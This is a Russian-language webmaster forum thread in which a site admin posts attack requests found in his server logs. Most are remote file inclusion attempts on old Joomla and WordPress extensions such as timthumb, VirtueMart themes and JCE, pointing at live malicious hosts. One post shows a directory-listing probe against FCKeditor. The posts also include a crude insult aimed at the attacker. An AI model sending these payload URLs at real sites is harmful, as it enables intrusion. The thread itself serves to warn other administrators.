×
Твой новый блог на Ruby on Rails (25 дек 2020)

Не жумлой единой, как говорится. Подключайтесь. :)

Вопрос Как взламывали Masterpro.ws

Больше
6 года 8 мес. назад #11 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Продолжаем тему о возможных сценариях атак на сайты под управлением Joomla. Несколько get-запросов, выуженных мной из логов, позволяют сделать вывод о том, что в арсенале доморощенных кулхацкеров сегодня по прежнему прочно остаются ветхозаветные уязвимости в темах VirtueMart - pbv_multi и pbv_evod, также в ходу старые как мир попытки атаки на /com_virtuemart/show_image_in_imgtag.php. Вероятно, многие до сих пор еще живут с register_globals=On на серваках?


http://masterpro.ws/forum/17-joomla/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http://img.youtube.com.internet3g.ro/gcc.php

http://masterpro.ws/forum/17-joomla/4564-problema-pri-perenose-joomla&sa=U&ei=pHpKU5yxLObT8gG93IH4Dw&ved=0CGoQFjAP&usg=AFQjCNGkk2PI9lU_BYydefCImKwt9TTIYg/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http://img.youtube.com.internet3g.ro/gcc.php

http://www.masterpro.ws/forum/17-joomla/components/com_virtuemart/themes/pbv_evod/scripts/timthumb-released.php?src=http://img.youtube.com.internet3g.ro/rawk.php

Также обращает на себя внимание вот эта попытка, взгляните:

http://masterpro.ws/forum/13------/2808---outlook-list-most-popular-uk.htmlb-21/lay-swtor/?utm_source=twitterfeed&utm_medium=twitter%D9%84%D9%88%D8%B2%D9%86-%D9%84%D8%AA%D8%AD%D9%85%D9%84%D9%87-%D9%85%D8%B9%D9%83-%D8%A3%D9%8A%D9%86%D9%85%D8%A7-%D8%AA%D8%B0%D9%87%D8%A8-&eurl=http%3A%2F%2Fmockingjay.net%2F2011%2F10%2F28%2Fjackie-emerson-amandla-stenberg-talk-filming-foxface-rues-death-scenes%2F&feature=player_embedded&v=y0HIKV-wB7I&gl=USMzNmBHBzdGNhdAMEcHQDc3MtZ2FsbGVyeQR0ZXN0Aw--;_ylv=3GVzdAM-;_ylv=300000000000000000000000000000000000000&player=1

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 8 мес. назад - 6 года 8 мес. назад #12 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Сегодня дошла очередь и до WordPress; вполне вероятно, что тема NewsPro грешит прорехами безопасности. Не знаю, не гуглил и не копал... вот думаю, не сделать ли мне security-рассылку по названиям расширений, выуживаемых мной из логов? Видите, как немало можно узнать, копаясь... не, ну не в мусоре, конечно; - в логах. :)


http://masterpro.ws/wp-content/themes/NewsPro/timthumb.php?src=http://img.youtube.com.internet3g.ro/gcc.php

http://masterpro.ws/articles&sa=U&ei=nr5jU9_vFYmAogTHiICYDQ&ved=0CEgQFjAH&usg=AFQjCNHaHvIGmvGCmC_x7PcclIixHAkWnQ/wp-content/themes/NewsPro/timthumb.php?src=http://img.youtube.com.internet3g.ro/gcc.php

Кроме шуток. Всем, использующим неактуальные (по любой причине) версии названных в данном топике расширений - рекомендую.. ну, словом, вы меня поняли. Честно купить и незамедлительно обновиться, если речь о коммерческом ПО. Скупой платит дважды, да и головняк всегда немалый. Знаем, плавали... сколько уже было, тупых этих офисов c пиратской виндой в бухгалтерии и ворованным Каспером на workstations.... "Алексей, ну у нас полдня бухгалтера работать не могли, пока вы сервак восстановили после последней вирусной атаки! Неужели нельзя было скорее???"

Овцы, блин. :laugh:
Последнее редактирование: 6 года 8 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 8 мес. назад - 6 года 8 мес. назад #13 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Рад случаю добавить еще один зловредный web-ресурс в нашу коллекцию; это прозвучало следующим образом:

http://masterpro.ws////////?mosConfig_absolute_path=http://nerdcurioso.com.br/blogs//9991.flv???

По ссылке (после mosConfig_absolute_path) находим файл c расширением flv, который, разумеется, не имеет ни малейшего отношения к flash video. Самые любознательные могут вдосталь полюбоваться и исследовать содержимое файла, легко идентифицируемого clamav всего лишь как php.bot:

# clamscan -r /home/aleksej/tmp
-----
/home/aleksej/tmp/9991.flv: PHP.Bot FOUND
Последнее редактирование: 6 года 8 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 8 мес. назад #14 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Очередная попытка, очередной инклюд.
http://www.masterpro.ws/forum/17-joomla/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http://admin.santels.com/contact.php

Зайдя по ссылке
http://admin.santels.com/contact.php


- получаем закодированный в eval(gzinflate(base64_decode скрипт, для расшифровки которого возможно воспользоваться одним из этих двух декодеров - здесь или здесь . Читаем и наслаждаемся.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 6 мес. назад #15 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Хм, продолжаем наши занимательные истории. Давно не было инклюдов, ну и вот.... новая крутейшая попытка, делающая сомнительную честь ее автору. Пора учреждать премию "Золотая it-калоша", а? - которую вручим самому-самому самонадеянному, самому из всех уверенному в собственной исключительности, очередному непризнанному гению- кулхацкеру? :laugh:


http://www.masterpro.ws/forum/17-joomla//index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://picasa.com.denstones.com/mark.php?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 6 мес. назад #16 от Guest
Guest ответил в теме Как взламывали Masterpro.ws
алексей, на странички этого топика возможно зайти только отключив антивирус, вы в курсе?

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 6 мес. назад - 6 года 6 мес. назад #17 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Да, мне говорили. Ну, что ж я могу поделать. Темка-то ведь нужная и весьма познавательная... если ваш антивирус считает, что в joomla-сайте одна из страниц может быть заражена, а остальные - не заражены... это проблемы антивируса. Главное, чтобы Яша и Гоша так не считали; а они так не считают.

Взгляните, вот еще одни повод для тревоги вашего антивируса. Приведенный в этих постах синтаксис атак, безусловно, носит веерный характер и рассылается во все стороны, безадресно... но не всегда так бывает. Судя по всему, данная тема не нравится не только вашему антивирю, но и еще кое-кому, чьи способности и профессиональные знания в выбранной сфере деятельности трагически отстают даже от эвристики каспера... взгляните, скажем, на этот сценарий, он напрямую адресован не так уж часто используемому в России шаблону нашего сайта.

http://vash_site/component/mailto/%3ftmpl=component%26template=jsn_epic_pro%26link=db87c931bb7a536acabfcd10017daed6400d8acf//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php
Последнее редактирование: 6 года 6 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 4 мес. назад #18 от serge
serge ответил в теме Как взламывали Masterpro.ws
А я вижу в логах одного из вверенных мне сайтов такой get-запрос... попытка взлома не имеет отношения к masterpro.ws, но в чем-то похоже... даже и не упомню, что за com_joomlalib такой?

http://mysite.ru//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pacificcounselling.ca/tmp/bonze.jpg??

P.S. хотя не, вспомнил, была вроде уязвимость в этом компоненте много лет назад.

А я смогу! - А поглядим! - А я упрямый!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 2 мес. назад #19 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
Ок, продолжаем нашу летопись.
Вроде не было раньше этого модуля - mod_raxo_allmode - в синтаксисе наших с вами злонамеренных GET-запросов? Ну и вот, теперь он появился:
http://masterpro.ws//modules/mod_raxo_allmode/tools/tb.php?src=http://picasa.com.konakihotel-pelion.com/uplod.php

Глянул в JED, действительно, RAXO All-mode PRO... возможно, речь идет о старой версии расширения, но тем не менее. Будьте осторожнее с RAXO All-mode PRO, админы!

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 1 мес. назад #20 от Aleksej
Aleksej ответил в теме Как взламывали Masterpro.ws
http://masterpro.ws/admin/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../

http://masterpro.ws/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../

Гы, неслабый шажок вперед. Синтаксис атаки немного изменился... давай-давай, суперхакер, еще немного поднапрячься - и у тебя, скорее всего, даже все получится: ты сумеешь забыть о всех своих проблемах детского периода, унижения одноклассников, и даже о том, как хотелось когда-то трахнуть свою маму. :laugh:

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.